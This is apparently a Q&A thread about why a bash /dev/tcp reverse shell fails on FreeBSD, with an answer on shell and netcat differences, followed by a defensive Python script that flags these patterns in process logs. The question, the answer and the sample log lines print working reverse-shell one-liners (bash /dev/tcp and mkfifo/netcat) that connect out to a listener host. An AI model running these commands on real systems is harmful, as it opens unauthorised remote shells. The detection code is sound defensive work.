
I’ve been experimenting with penetration testing recently, and I need to use reverse shell techniques for testing. I’ve previously used reverse shell on Ubuntu with the following command:

/bin/bash -i >& /dev/tcp/<Listener IP>/9090 0>&1

Now, I want to achieve the same on a FreeBSD system for testing purposes.

I found this website Reverse Shell Cheatsheet and saw the following command:

rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4242 > /tmp/f

However, when I tried to implement it, I encountered an "Ambiguous output redirect" error. Initially, using nc <Listener IP> 9090 works successfully. Therefore, I’m looking for assistance to resolve this issue. Thank you!

  • Have you tried by installing the bash shell and using the same command as on Ubuntu? Also, error messages are usually preceded by the name of the utility that produced it. What is the complete unedited error message that you get from your pipeline?
    – Kusalananda
    Commented Jun 26 at 10:44
  • Thank you very much. Based on your suggestion, I switched my CLI to /usr/local/bin/bash and then executed /bin/sh -i >& /dev/tcp/<Listener IP>/9090 0>&1 in bash. This method indeed worked, but I would like to understand the reason behind it. Could you explain why this happens? I know that /bin/csh, /bin/sh, and /usr/local/bin/bash are different shells, but why does the command /bin/sh -i >& /dev/tcp/<Listener IP>/9090 0>&1 work in /usr/local/bin/bash but not in /bin/csh and /bin/sh? Additionally, is there any way to achieve a reverse shell in /bin/csh and /bin/sh?
    – HsingLI
    Commented Jun 27 at 5:22

1 Answer


You are confusing terminologies but more importantly: binaries.

You state in the comment that you understand the difference between the shells. But the important part is to understand that there are different implementations (binaries). This goes for all the command line utilities you use as well. That is why the reverse shell cheatsheet has so many options, so you can use the tools already installed on the system.

On FreeBSD the default sh shell is the Almquist shell. On Linux it depends on your distribution. You can read up on Difference between sh and Bash and What is the difference between ash and sh shell on Linux?

More importantly, the /dev filesystem is not 100% 1:1 between Linux and FreeBSD. But your redirection using /dev/tcp is not even going through the filesystem, as /dev/tcp is a bashism and only implemented in bash. See Different ways to use /dev/tcp/host/port command and where to find manual pages on this.

So if you can use /dev/tcp with sh you are most likely using bash in sh mode.

Then you play around with netcat. But note there are different implementations here as well. FreeBSD has a default netcat but you might prefer to install GNU netcat which is commonly used on Linux. Then you can use familiar tools.

FreeBSD also by default comes with mkfifo and mknod which you attempt to use but fail to document how it fails.

On FreeBSD Perl is usually installed by default, so that is a common route as well if you cannot install additional tools. Remember that the "reverse shell" is just an attempt to set up a TCP connection to a command line using the tools already available on the box. This is mostly done to avoid common logs. If you do not care about that, most boxes are using SSH and it is trivial to run an SSH reverse tunnel using the -R parameter.

  • Thank you very much for your detailed response. After reading through the content, I have a general understanding. I will further review the details and reference links. I truly appreciate your help and reply.
    – HsingLI
    Commented Jun 28 at 3:43
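The answer's point that these are shell- and binary-specific techniques also matters on the defensive side: the same three patterns discussed in this thread (a bash-only /dev/tcp redirection, a named pipe wired to netcat, and an ssh -R remote forward) are what a process-execution log would show, and the interpreter that ran the command tells you whether a /dev/tcp attempt could even have worked. The following is an added example, not code from the question or answer above, that scans constructed log lines for those patterns. The log format, host names, user names and the 203.0.113.x addresses are assumptions made up for the example.

```python
"""Flag reverse-shell style command lines in process-execution logs.

Constructed log format (an assumption, not a real auditd or eBPF format):
    <ISO time> host=<name> user=<name> exe=<interpreter> cmd=<command line>
"""
import re
from typing import List

# Indicators taken from the techniques discussed in the thread.
INDICATORS = {
    # bash-only /dev/tcp or /dev/udp redirection; the path never exists on disk
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    # a named pipe made with mkfifo or "mknod ... p" plus a netcat on the same line
    "fifo_netcat": re.compile(
        r"(?:mkfifo|mknod\s+\S+\s+p)\b.*\b(?:nc|netcat)\b", re.S),
    # ssh -R remote port forward, the built-in tunnel the answer mentions
    "ssh_remote_forward": re.compile(r"\bssh\b[^|;&]*\s-R\s*\S+"),
}

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+"
    r"exe=(?P<exe>\S+)\s+cmd=(?P<cmd>.*)$"
)


def classify(cmdline: str) -> List[str]:
    """Return the names of every indicator that matches one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def scan(lines: List[str]) -> List[dict]:
    """Parse log lines and return one record per line that matched an indicator."""
    findings = []
    for raw in lines:
        m = LOG_RE.match(raw.strip())
        if not m:
            continue  # not in the expected format; a real pipeline would count these
        hits = classify(m["cmd"])
        if not hits:
            continue
        rec = m.groupdict()
        rec["indicators"] = hits
        # /dev/tcp is handled by bash itself, so under csh or FreeBSD's sh the
        # redirection fails (the thread's "Ambiguous output redirect" case);
        # that is still worth recording as an attempt during triage.
        interpreter = m["exe"].rsplit("/", 1)[-1]
        if "bash_dev_tcp" in hits and interpreter != "bash":
            rec["note"] = "/dev/tcp under non-bash interpreter: likely a failed attempt"
        findings.append(rec)
    return findings


# Constructed sample log: two /dev/tcp attempts (csh, then bash), a fifo+nc
# pipeline, an ssh -R forward, and two benign lines that must not be flagged.
SAMPLE_LOG = [
    "2024-06-26T10:44:01Z host=bsd1 user=www exe=/bin/csh "
    "cmd=/bin/sh -i >& /dev/tcp/203.0.113.5/9090 0>&1",
    "2024-06-26T10:44:09Z host=bsd1 user=www exe=/usr/local/bin/bash "
    "cmd=/bin/sh -i >& /dev/tcp/203.0.113.5/9090 0>&1",
    "2024-06-26T10:45:12Z host=bsd1 user=www exe=/bin/sh "
    "cmd=rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 203.0.113.5 4242 > /tmp/f",
    "2024-06-26T10:46:30Z host=bsd1 user=ops exe=/usr/bin/ssh "
    "cmd=ssh -R 2222:localhost:22 ops@203.0.113.5",
    "2024-06-26T10:47:00Z host=bsd1 user=ops exe=/bin/sh cmd=ls -la /dev | grep tcp",
    "2024-06-26T10:47:05Z host=bsd1 user=ops exe=/usr/bin/mkfifo cmd=mkfifo /var/run/myapp.fifo",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["host"], f["user"], f["indicators"], f.get("note", ""))
```

The regexes are deliberately tied to the shapes on this page rather than to a general netcat signature: a lone mkfifo or a grep over /dev is normal administration, so the fifo rule requires a netcat on the same command line, and the /dev/tcp rule only matches the host/port form bash actually interprets. Running the script lists four findings; the csh line carries the extra note because, as the answer explains, that interpreter cannot open /dev/tcp at all.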
